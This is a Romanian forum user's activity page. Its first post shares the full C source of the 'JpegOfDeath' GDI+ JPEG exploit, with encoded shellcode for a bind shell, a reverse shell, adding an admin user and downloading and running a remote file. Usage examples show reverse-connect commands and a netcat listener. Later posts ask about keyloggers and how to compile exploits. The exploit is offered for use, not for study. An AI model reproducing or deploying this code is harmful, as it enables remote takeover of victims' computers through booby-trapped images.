Jump to content

bossjuan

Active Members
 View Profile  See their activity

  • Posts

    295

  • Joined

  • Last visited

 Content Type 

Everything posted by bossjuan

  1. bossjuan
    http://rapidshare.de/files/25029686/jpegadmin.rar.html si exploit-ul Exploit: /* * Exploit Name: * ============= * JpegOfDeath.M.c v0.6.a All in one Bind/Reverse/Admin/FileDownload * ============= * Tweaked Exploit By M4Z3R For GSO * All Credits & Greetings Go To: * ========== * FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha, #romhack * Peter Winter-Smith, IsolationX, YpCat, Aria Giovanni, * Nick Fitzgerald, Adam Nance (where are you?), * Santa Barbara, Jenna Jameson, John Kerry, so1o, * Computer Security Industry, Rom Hackers, My chihuahuas * (Rocky, Sailor, and Penny)... * =========== * Flags Usage: * -a: Add User X with Pass X to Admin Group; * IE: Exploit.exe -a pic.jpg * -d: Download a File From an HTTP Server; * IE: Exploit.exe -d [url]http://YourWebServer/Patch.exe[/url] pic.jpg * -r: Send Back a Shell To a Specified IP on a Specific Port; * IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg (Default Port is 1337) * -b: Bind a Shell on The Exploited Machine On a Specific Port; * IE: Exploit.exe -b -p 132 pic.jpg (Default Port is 1337) * Disclaimer: * =========== * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE * */  #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #pragma comment(lib, "ws2_32.lib") // Exploit Data... char reverse_shellcode[] = "xD9xE1xD9x34" "x24x58x58x58x58x80xE8xE7x31xC9x66x81xE9xACxFEx80" "x30x92x40xE2xFAx7AxA2x92x92x92xD1xDFxD6x92x75xEB" "x54xEBx7Ex6Bx38xF2x4Bx9Bx67x3Fx59x7Fx6ExA9x1CxDC" "x9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6Cx21x84xC5xC1" "xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6x1Bx77x1BxCF" "x92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2x8Ex3Fx19xCA" "x9Ax79x9Ex1FxC5xB6xC3xC0x6Dx42x1Bx51xCBx79x82xF8" "x9AxCCx93x7CxF8x9AxCBx19xEFx92x12x6Bx96xE6x76xC3" "xC1x6DxA6x1Dx7Ax1Ax92x92x92xCBx1Bx96x1Cx70x79xA3" "x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92x6DxC7x8AxC5" "xC5xC5xC5xD5xC5xD5xC5x6DxC7x86x1Bx51xA3x6DxFAxDF" "xDFxDFxDFxFAx90x92xB0x83x1Bx73xF8x82xC3xC1x6DxC7" "x82x17x52xE7xDBx1FxAExB6xA3x52xF8x87xCBx61x39x54" "xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxCExB6xDAx1B" "xCExB6xDEx1BxCExB6xC2x1FxD6xB6x82xC6xC2xC3xC3xC3" "xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xBAx1Bx73x79x9C" "xFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xB6xC5x6DxC7x9Ex6DxC7" "xB2xC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97xEA" "x93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6x19" "x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9Fx93" "x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4x19" "x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3x52" "x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52"; char bind_shellcode[] = "xD9xE1xD9x34x24x58x58x58" "x58x80xE8xE7x31xC9x66x81xE9x97xFEx80x30x92x40xE2" "xFAx7AxAAx92x92x92xD1xDFxD6x92x75xEBx54xEBx77xDB" "x14xDBx36x3FxBCx7Bx36x88xE2x55x4Bx9Bx67x3Fx59x7F" "x6ExA9x1CxDCx9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6C" "x21x84xC5xC1xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6" "x1Bx77x1BxCFx92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2" "x8Ex3Fx19xCAx9Ax79x9Ex1FxC5xBExC3xC0x6Dx42x1Bx51" "xCBx79x82xF8x9AxCCx93x7CxF8x98xCBx19xEFx92x12x6B" "x94xE6x76xC3xC1x6DxA6x1Dx7Ax07x92x92x92xCBx1Bx96" "x1Cx70x79xA3x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92" "x6DxC7xB2xC5xC5xC5xC5xD5xC5xD5xC5x6DxC7x8Ex1Bx51" "xA3x6DxC5xC5xFAx90x92x83xCEx1Bx74xF8x82xC4xC1x6D" "xC7x8AxC5xC1x6DxC7x86xC5xC4xC1x6DxC7x82x1Bx50xF4" "x13x7ExC6x92x1FxAExB6xA3x52xF8x87xCBx61x39x1Bx45" "x54xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxEExB6xDA" "x1BxEExB6xDEx1BxEExB6xC2x1FxD6xB6x82xC6xC2xC3xC3" "xC3xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xA2x1Bx73x79" "x9CxFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xBExC5x6DxC7x9Ex6D" "xC7xBAxC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97" "xEAx93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6" "x19x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9F" "x93x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4" "x19x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3" "x52x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52"; char http_shellcode[]= "xEBx0Fx58x80x30x17x40x81x38x6Dx30x30x21x75xF4" "xEBx05xE8xECxFFxFFxFFxFEx94x16x17x17x4Ax42x26" "xCCx73x9Cx14x57x84x9Cx54xE8x57x62xEEx9Cx44x14" "x71x26xC5x71xAFx17x07x71x96x2Dx5Ax4Dx63x10x3E" "xD5xFExE5xE8xE8xE8x9ExC4x9Cx6Dx2Bx16xC0x14x48" "x6Fx9Cx5Cx0Fx9Cx64x37x9Cx6Cx33x16xC1x16xC0xEB" "xBAx16xC7x81x90xEAx46x26xDEx97xD6x18xE4xB1x65" "x1Dx81x4Ex90xEAx63x05x50x50xF5xF1xA9x18x17x17" "x17x3ExD9x3ExE0xFExFFxE8xE8xE8x26xD7x71x9Cx10" "xD6xF7x15x9Cx64x0Bx16xC1x16xD1xBAx16xC7x9ExD1" "x9ExC0x4Ax9Ax92xB7x17x17x17x57x97x2Fx16x62xED" "xD1x17x17x9Ax92x0Bx17x17x17x47x40xE8xC1x7Fx13" "x17x17x17x7Fx17x07x17x17x7Fx68x81x8Fx17x7Fx17" "x17x17x17xE8xC7x9Ex92x9Ax17x17x17x9Ax92x18x17" "x17x17x47x40xE8xC1x40x9Ax9Ax42x17x17x17x46xE8" "xC7x9ExD0x9Ax92x4Ax17x17x17x47x40xE8xC1x26xDE" "x46x46x46x46x46xE8xC7x9ExD4x9Ax92x7Cx17x17x17" "x47x40xE8xC1x26xDEx46x46x46x46x9Ax82xB6x17x17" "x17x45x44xE8xC7x9ExD4x9Ax92x6Bx17x17x17x47x40" "xE8xC1x9Ax9Ax86x17x17x17x46x7Fx68x81x8Fx17xE8" "xA2x9Ax17x17x17x44xE8xC7x48x9Ax92x3Ex17x17x17" "x47x40xE8xC1x7Fx17x17x17x17x9Ax8Ax82x17x17x17" "x44xE8xC7x9ExD4x9Ax92x26x17x17x17x47x40xE8xC1" "xE8xA2x86x17x17x17xE8xA2x9Ax17x17x17x44xE8xC7" "x9Ax92x2Ex17x17x17x47x40xE8xC1x44xE8xC7x9Ax92" "x56x17x17x17x47x40xE8xC1x7Fx12x17x17x17x9Ax9A" "x82x17x17x17x46xE8xC7x9Ax92x5Ex17x17x17x47x40" "xE8xC1x7Fx17x17x17x17xE8xC7xFFx6FxE9xE8xE8x50" "x72x63x47x65x78x74x56x73x73x65x72x64x64x17x5B" "x78x76x73x5Bx7Ex75x65x76x65x6Ex56x17x41x7Ex65" "x63x62x76x7Bx56x7Bx7Bx78x74x17x48x7Bx74x65x72" "x76x63x17x48x7Bx60x65x7Ex63x72x17x48x7Bx74x7B" "x78x64x72x17x40x7Ex79x52x6Fx72x74x17x52x6Fx7E" "x63x47x65x78x74x72x64x64x17x40x7Ex79x5Ex79x72" "x63x17x5Ex79x63x72x65x79x72x63x58x67x72x79x56" "x17x5Ex79x63x72x65x79x72x63x58x67x72x79x42x65" "x7Bx56x17x5Ex79x63x72x65x79x72x63x45x72x76x73" "x51x7Ex7Bx72x17x17x17x17x17x17x17x17x17x7Ax27" "x27x39x72x6Fx72x17" "m00!"; char admin_shellcode[] = "x66x81xecx80x00x89xe6xe8xb7x00x00x00x89x06x89xc3" "x53x68x7exd8xe2x73xe8xbdx00x00x00x89x46x0cx53x68" "x8ex4ex0execxe8xafx00x00x00x89x46x08x31xdbx53x68" "x70x69x33x32x68x6ex65x74x61x54xffxd0x89x46x04x89" "xc3x53x68x5exdfx7cxcdxe8x8cx00x00x00x89x46x10x53" "x68xd7x3dx0cxc3xe8x7ex00x00x00x89x46x14x31xc0x31" "xdbx43x50x68x72x00x73x00x68x74x00x6fx00x68x72x00" "x61x00x68x73x00x74x00x68x6ex00x69x00x68x6dx00x69" "x00x68x41x00x64x00x89x66x1cx50x68x58x00x00x00x89" "xe1x89x4ex18x68x00x00x5cx00x50x53x50x50x53x50x51" "x51x89xe1x50x54x51x53x50xffx56x10x8bx4ex18x49x49" "x51x89xe1x6ax01x51x6ax03xffx76x1cx6ax00xffx56x14" "xffx56x0cx56x6ax30x59x64x8bx01x8bx40x0cx8bx70x1c" "xadx8bx40x08x5exc2x04x00x53x55x56x57x8bx6cx24x18" "x8bx45x3cx8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01" "xebxe3x32x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38" "xe0x74x07xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1" "x8bx5ax24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04" "x8bx01xe8xebx02x31xc0x89xeax5fx5ex5dx5bxc2x08x00"; char header1[] = "xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64" "x00x64x00x00xFFxECx00x11x44x75x63x6Bx79x00x01x00" "x04x00x00x00x0Ax00x00xFFxEEx00x0Ex41x64x6Fx62x65" "x00x64xC0x00x00x00x01xFFxFEx00x01x00x14x10x10x19" "x12x19x27x17x17x27x32xEBx0Fx26x32xDCxB1xE7x70x26" "x2Ex3Ex35x35x35x35x35x3E"; char setNOPs1[] = "xE8x00x00x00x00x5Bx8Dx8B" "x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8"; char setNOPs2[] = "x3ExE8x00x00x00x00x5Bx8Dx8B" "x2Fx00x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8"; char header2[] = "x44" "x44x44x44x44x44x44x44x44x44x44x44x44x01x15x19x19" "x20x1Cx20x26x18x18x26x36x26x20x26x36x44x36x2Bx2B" "x36x44x44x44x42x35x42x44x44x44x44x44x44x44x44x44" "x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44" "x44x44x44x44x44x44x44x44x44x44x44x44x44xFFxC0x00" "x11x08x03x59x02x2Bx03x01x22x00x02x11x01x03x11x01" "xFFxC4x00xA2x00x00x02x03x01x01x00x00x00x00x00x00" "x00x00x00x00x00x03x04x01x02x05x00x06x01x01x01x01" "x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x02" "x03x10x00x02x01x02x04x05x02x03x06x04x05x02x06x01" "x05x01x01x02x03x00x11x21x31x12x04x41x51x22x13x05" "x61x32x71x81x42x91xA1xC1x52x23x14xB1xD1x62x15xF0" "xE1x72x33x06x82x24xF1x92x43x53x34x16xA2xD2x63x83" "x44x54x25x11x00x02x01x03x02x04x03x08x03x00x02x03" "x01x00x00x00x00x01x11x21x31x02x41x12xF0x51x61x71" "x81x91xA1xB1xD1xE1xF1x22x32x42x52xC1x62x13x72x92" "xD2x03x23x82xFFxDAx00x0Cx03x01x00x02x11x03x11x00" "x3Fx00x0Fx90xFFx00xBCxDAxB3x36x12xC3xD4xADxC6xDC" "x45x2FxB2x97xB8x9DxCBx63xFDx26xD4xC6xD7x70xA4x19" "x24x50xCAx46x2BxFCxEBx3BxC7xC9xA5x4Ax8Fx69x26xDF" "x6Dx72x4Ax9Ex27x6Bx3ExE6x92x86x24x85x04xDBxEDxA9" "x64x8Ex6Bx63x67x19x1AxA5xE7xB8x28x3Dx09xABx5Dx5F" "x16xF7x8CxEDx49x4CxF5x01xE6xE5xD5x1Cx49xABx10x71" "xA6x36x9Bx93x24x61x00x0Fx61xECx34xA7x9Cx23xF4x96" "xC6xE6xAFxB7x80x76xEFx93xF0xAAx28x8Ax6BxE0x18xC0" "xA4x9Bx7Ex90x39x03xC2x90xDCx43x31x91x62x91x86x23" "x35x35xA2x80x4DxFAx72x31x07x9Dx03x70xA8x93x24x4F" "x89x51x83x5ExA4x2Ex7AxC0x7DxA9x8Ax10x61x64x07xFA" "x88xC6x89x26xDAx0Fx20xBDxB9x16xD2xA8xE8x91x3Fx1A" "xE2xBAxF0xBEx74xABx1DxC4x44x15x1Ax8Ax9CxC7x2Ax6B" "xA3x33xB7x1Ex88x47x69xA9x64x68x26xC1x97x0BxD6x86" "x8Bx1Bx29xC6x87xE4xC7xFDxCCx53x11xA5x9Cx62x6AxE5" "x40x37x61x89xF6xB2x9Cx2Ax7CxFDx05x6Ax30x5Fx52x02" "xEBx72xBFx7Dx74x4Cx23xB9x8FxD8x78x67x54x59x64x47" "xC5x75x21x18xD5xE3x58xE1x72x63xBFx6DxBDxCBxCAx82" "x65xE7xDBx09x54x4Fx0Dx95x86x76xE3xF2xA0x48x82x55" "xD7xA6xCExA7xAAxDCx6AxF1xA9x8ExE0x35xC1xCAxA1xD4" "x93xD2xD6x39x95x3Cx6Bx46x60xACxC1x3Bx60xC9x70x84" "x8ExA1x9Ax9Ax20x01x94xCAx08x91x53xDCx01xB1xB5x12" "x37x11xC6xC1xACxF1x11xD4x9Cx6Bx3Ex69x76xF0x1Dx7B" "x52x6DxC9xA8x66x94xBBx79x8Fx7ExDEx17xFDx4DxABx1E" "x76x7AxA3x2BxE2x50x06xB7x2CxEBx2Ax49xC9xEAx4Ex9B" "xE7xCAxAFx1ExECx23xDCx8BxE1x6Bx5Fx1Ax9BxE8x49x2E" "x63xE5x03x32xCDx19xB8x23x10x78x1Fx85x5Cx15x8Cx97" "x84x9BxDBx15x35x9Fx16xE0x1Ex86xB9x8Fx97x11x4ExDA" "x35x02x45x25x93xF8x55x24x17xB9x1BxF5xC8x07xA9xE2" "x2Ax76xB0xC2x37x01x95xADx81xB6x1Cx6AxA2x38xD9xAE" "xCAx59x18x75x25xFFx00x81xAExD8xE8xBBx47x62xACxB7" "xB6xA1x8Dx40xE3x86x65x6Dx1ExDBx89x2Fx9DxCDx6Bx24" "x62x41x61x89xACx2Dx8Bx3ExB6x68xC0x63x73x70x6Bx6B" "x6AxA1x7AxACx56xE7x11x56x58xD4x13xA4x0BxB6xEBxB3" "x3Bx47x22x95xD3x53x2ExEAx19x86x96xF7x03x83x52x9E" "x54xABx6Ex58x63x7Cx33xCEx93xB1x19x1CxE9xDBxAAx35" "xBFx46x8DxD4xD2x56xE0xE0x33xA1x4Dx0Ax4Ex3BxB1xCD" "xD4x06x44x56x4AxCDx24x26xEAx6Dx7Ax87xDCx3Bx60x6D" "xFCx2Ax86x1Bx97x36x6Dx42x04xA0x11xEExE7x46x22x35" "xD5x26xB0x1Cx0Bx7Cx69x5Fx06xECx5AxC5x0Bx46x70x27" "xF2xD4x79xADx89xDAx30x74xBDx98xE4x68x58x86xE4x1B" "x69xB9xDCx2Bx30x87x48x53xC5x85x3BxDDx8Ax4ExB5x42" "xB2x8Cx6Ex2Cx01xF8x56x04x7BxC9xA3x05x4FxB4xD5xA2" "xDFxF6xFDxC6xE2xA7x3Cx89x24xFExA9x5ExC3xD4x6DxF7" "x85xC9x59x39x63x59x9BxFFx00x06x1Ax5ExFAx69x0Ax46" "x2BxC0x9FxC2x91x8BxC9x40x58x16xBDxF2xC0xD3x3Bx7F" "x2DxA9xBBx2Ex49x42x6Dx52x70x39x62x9Fx08x73x6Fx20" "x09x64x00x01x83x2Bx00xD5x97xBCxDCxF6x9CxA7x66xEA" "xD9xB6x9FxE1x56xDExBAxECx65xB4x44xD8xE3x8Dx52x2F" "x36xCEx74x33x7Ex9Fx2Ex22x99x8BxC9x6Dx5Ax6Dx9ExA8" "x22xC7x0CxA8x62x3Dx17x1Dx2FxC8xFAxD4xB0x9Ex14x45" "x45xD5x6Ex96x04xE1xF1xA0x37x90x5BxD8x7Fx81x57x1B" "xC8xD5x48x27x0Ex3Cx6Bx3DxCDx44x15x92x41x25x94x82" "xAEx0Ex42x97x8Dx8Cx6DxAEx56xB8x26xD8x0FxE3x43x93" "x73x18x75x28xD7xF8xD5xFFx00x74xE4x18xC2x82xACx6F" "x86x7Fx2Ax4CxBExE5xFCxD2x22xCCx9Ax32xD1x7Cx7Dx68"; char admin_header0[]= "xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64x00x60x00x00" "xFFxECx00x11x44x75x63x6Bx79x00x01x00x04x00x00x00x0Ax00x00" "xFFxEEx00x0Ex41x64x6Fx62x65x00x64xC0x00x00x00x01" ; char admin_header1[]= "xFFxFEx00x01" ; char admin_header2[]= "x00x14x10x10x19x12x19x27x17x17x27x32" ; char admin_header3[]= "xEBx0Fx26x32" ; char admin_header4[]= "xDCxB1xE7x70" ; char admin_header5[]= "x26x2Ex3Ex35x35x35x35x35x3E" "xE8x00x00x00x00x5Bx8Dx8B" "x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8" ; char admin_header6[]= "x00x00x00xFFxDBx00x43x00x08x06x06x07x06x05x08x07x07" "x07x09x09x08x0Ax0Cx14x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14" "x1Dx1Ax1Fx1Ex1Dx1Ax1Cx1Cx20x24x2Ex27x20x22x2Cx23x1C" "x1Cx28x37x29x2Cx30x31x34x34x34x1Fx27x39x3Dx38x32x3C" "x2Ex33x34x32xFFxDBx00x43x01x09x09x09x0Cx0Bx0Cx18x0D" "x0Dx18x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x32" "x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32" "x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32" "x32x32x32x32x32xFFxC0x00x11x08x00x03x00x03x03x01x22" "x00x02x11x01x03x11x01xFFxC4x00x1Fx00x00x01x05x01x01" "x01x01x01x01x00x00x00x00x00x00x00x00x01x02x03x04x05" "x06x07x08x09x0Ax0BxFFxC4x00xB5x10x00x02x01x03x03x02" "x04x03x05x05x04x04x00x00x01x7Dx01x02x03x00x04x11x05" "x12x21x31x41x06x13x51x61x07x22x71x14x32x81x91xA1x08" "x23x42xB1xC1x15x52xD1xF0x24x33x62x72x82x09x0Ax16x17" "x18x19x1Ax25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43" "x44x45x46x47x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64" "x65x66x67x68x69x6Ax73x74x75x76x77x78x79x7Ax83x84x85" "x86x87x88x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3xA4" "xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3" "xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE1" "xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8" "xF9xFAxFFxC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01" "x01x00x00x00x00x00x00x01x02x03x04x05x06x07x08x09x0A" "x0BxFFxC4x00xB5x11x00x02x01x02x04x04x03x04x07x05x04" "x04x00x01x02x77x00x01x02x03x11x04x05x21x31x06x12x41" "x51x07x61x71x13x22x32x81x08x14x42x91xA1xB1xC1x09x23" "x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1x17x18x19" "x1Ax26x27x28x29x2Ax35x36x37x38x39x3Ax43x44x45x46x47" "x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68" "x69x6Ax73x74x75x76x77x78x79x7Ax82x83x84x85x86x87x88" "x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3xA4xA5xA6xA7" "xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3xC4xC5xC6" "xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4xE5" "xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx00" "x0Cx03x01x00x02x11x03x11x00x3Fx00xF9xFEx8Ax28xA0x0F" ; // Code... char newshellcode[2048]; unsigned char xor_data(unsigned char byte) { return(byte ^ 0x92); } void print_usage(char *prog_name) { printf(" Exploit Usage:n"); printf("t%s -r your_ip | -b [-p port] <jpeg_filename>nn", prog_name); printf("ttt -a | -d <source_file> <jpeg_filename>nn"); printf(" Parameters:nn"); printf("t-r your_ip or -bt Choose -r for reverse connect attack modenttttand choose -b for a bind attack. By defaultntttt if you don't specify -r or-b then a bindntttt attack will be generated.nn"); printf("t-a or -dtt The -a flag will create a user X with pass X, ntttt on the admin localgroup. The -d flag, willntttt execute the source http path of the filentttt given.n"); printf("nt-p (optional)tt This option will allow you to change the port ntttt used for a bind or reverse connect attack.ntttt If the attack mode is bindthen thentttt victim will open the -p port. If the attackntttt modeis reverse connect then the port yountttt specify will be the one you wantto listen ntttt on so the victim can connect to yountttt right away.nn"); printf(" Examples:n"); printf("t%s -r 68.6.47.62 -p 8888 test.jpgn", prog_name); printf("t%s -b -p 1542 myjpg.jpgn", prog_name); printf("t%s -a whatever.jpgn", prog_name); printf("t%s -d [url]http://webserver.com/patch.exe[/url] exploit.jpgnn", prog_name); printf(" Remember if you use the -r option to have netcat listeningn"); printf(" on the port you are using for the attack so the victim willn"); printf(" be able to connect to you when exploited...nn"); printf(" Example:n"); printf("tnc.exe -l -p 8888"); exit(-1); } int main(int argc, char *argv[]) { FILE *fout; unsigned int i = 0,j = 0; int raw_num = 0; unsigned long port = 1337; // default port for bind and reverse attacks unsigned long encoded_port = 0; unsigned long encoded_ip = 0; unsigned char attack_mode = 2; // bind by default char *p1 = NULL, *p2 = NULL; char ip_addr[256]; char str_num[16]; char jpeg_filename[256]; WSADATA wsa; printf(" +------------------------------------------------+n"); printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |n"); printf(" | Exploit by John Bissell A.K.A. HighT1mes |n"); printf(" | TweaKed By M4Z3R For GSO |n"); printf(" | September, 23, 2004 |n"); printf(" +------------------------------------------------+n"); if (argc < 2) print_usage(argv[0]); // process commandline for (i = 0; i < (unsigned) argc; i++) { if (argv[i][0] == '-') { switch (argv[i][1])  {   // reverse connect  case 'r':  strncpy(ip_addr, argv[i+1], 20);  attack_mode = 1;  break;   // bind  case 'b':  attack_mode = 2;  break;   // Add.Admin  case 'a':  attack_mode = 3;  break;  // DL  case 'd':  attack_mode = 4;  break;  // port  case 'p':  port = atoi(argv[i+1]);  break;  } } } strncpy(jpeg_filename, argv[i-1], 255); fout = fopen(argv[i-1], "wb");    if( !fout ) { printf("Error: JPEG File %s Not Created!n", argv[i-1]); return(EXIT_FAILURE); }  // initialize the socket library if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) { printf("Error: Winsock didn't initialize!n"); exit(-1); } encoded_port = htonl(port); encoded_port += 2; if (attack_mode == 1) {  // reverse connect attack reverse_shellcode[184] = (char) 0x90; reverse_shellcode[185] = (char) 0x92; reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff)); reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff)); p1 = strchr(ip_addr, '.'); strncpy(str_num, ip_addr, p1 - ip_addr); raw_num = atoi(str_num); reverse_shellcode[179] = xor_data((char)raw_num); p2 = strchr(p1+1, '.'); strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1); raw_num = atoi(str_num); reverse_shellcode[180] = xor_data((char)raw_num); p1 = strchr(p2+1, '.'); strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2); raw_num = atoi(str_num); reverse_shellcode[181] = xor_data((char)raw_num); p2 = strrchr(ip_addr, '.'); strncpy(str_num, p2+1, 5); raw_num = atoi(str_num); reverse_shellcode[182] = xor_data((char)raw_num); } if (attack_mode == 2) {  // bind attack bind_shellcode[204] = (char) 0x90; bind_shellcode[205] = (char) 0x92; bind_shellcode[191] = xor_data((char)((encoded_port >> 16) & 0xff)); bind_shellcode[192] = xor_data((char)((encoded_port >> 24) & 0xff)); } if (attack_mode == 4) {  // Http DL    strcpy(newshellcode,http_shellcode);    strcat(newshellcode,argv[2]);    strcat(newshellcode,"x01");   }   // build the exploit jpeg if ( attack_mode != 3) { j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;   for(i = 0; i < sizeof(header1) - 1; i++) fputc(header1[i], fout); for(i=0;i<sizeof(setNOPs1)-1;i++) fputc(setNOPs1[i], fout); for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i], fout); for( i = j; i < 0x63c; i++) fputc(0x90, fout); j = i; } if (attack_mode == 1) { for(i = 0; i < sizeof(reverse_shellcode) - 1; i++) fputc(reverse_shellcode[i], fout); } else if (attack_mode == 2) { for(i = 0; i < sizeof(bind_shellcode) - 1; i++) fputc(bind_shellcode[i], fout); } else if (attack_mode == 4) { for(i = 0; i<sizeof(newshellcode) - 1; i++) {fputc(newshellcode[i], fout);} for(i = 0; i< sizeof(admin_shellcode) - 1; i++) {fputc(admin_shellcode[i], fout);} } else if (attack_mode == 3) {  for(i = 0; i < sizeof(admin_header0) - 1; i++){fputc(admin_header0[i], fout);}   for(i = 0; i < sizeof(admin_header1) - 1; i++){fputc(admin_header1[i], fout);}  for(i = 0; i < sizeof(admin_header2) - 1; i++){fputc(admin_header2[i], fout);}   for(i = 0; i < sizeof(admin_header3) - 1; i++){fputc(admin_header3[i], fout);}  for(i = 0; i < sizeof(admin_header4) - 1; i++){fputc(admin_header4[i], fout);}  for(i = 0; i < sizeof(admin_header5) - 1; i++){fputc(admin_header5[i], fout);}   for(i = 0; i < sizeof(admin_header6) - 1; i++){fputc(admin_header6[i], fout);}   for (i = 0; i<1601; i++){fputc('x41', fout);}  for(i = 0; i < sizeof(admin_shellcode) - 1; i++){fputc(admin_shellcode[i], fout);} } if (attack_mode != 3 ) { for(i = i + j; i < 0x1000 - sizeof(setNOPs2) + 1; i++) fputc(0x90, fout); for( j = 0; i < 0x1000 && j < sizeof(setNOPs2) - 1; i++, j++) fputc(setNOPs2[j], fout);    } fprintf(fout, "xFFxD9"); fcloseall(); WSACleanup(); printf(" Exploit JPEG file %s has been generated!n", jpeg_filename); return(EXIT_SUCCESS); } ÂÂÂÂ
  2. bossjuan
    asta merg numai daca esti pe retea cu ip-ul respectiv sau?
  3. bossjuan
    marge la cineva keyloger-ul asta?
  4. bossjuan
    asa si dupa ce am instalat aia cum fac sa compilez un exploit sal fac exe? ce comenzi dau in consola"?
  5. bossjuan
    am nevoie de un driver pentru astea doua tipuri de tel puteti sa ma ajutati?
  6. bossjuan
    nu merge linck-ul
  7. bossjuan
    luati copii vil pune tata pe rapid share
  8. bossjuan
    si acre e PAROLA?
  9. bossjuan
    nu conteaza cum il iau chestia e ca il iau daca vreti
  10. bossjuan
    daca vreti pot sa cumpar un servar pentru acest site si il platesc eu la 2 luni ma intereseaza de acre ati vrea de linux sau de windows?
  11. bossjuan
    cum pot sa aflu imei`ul la un motorola v220
×
×
  • Create New...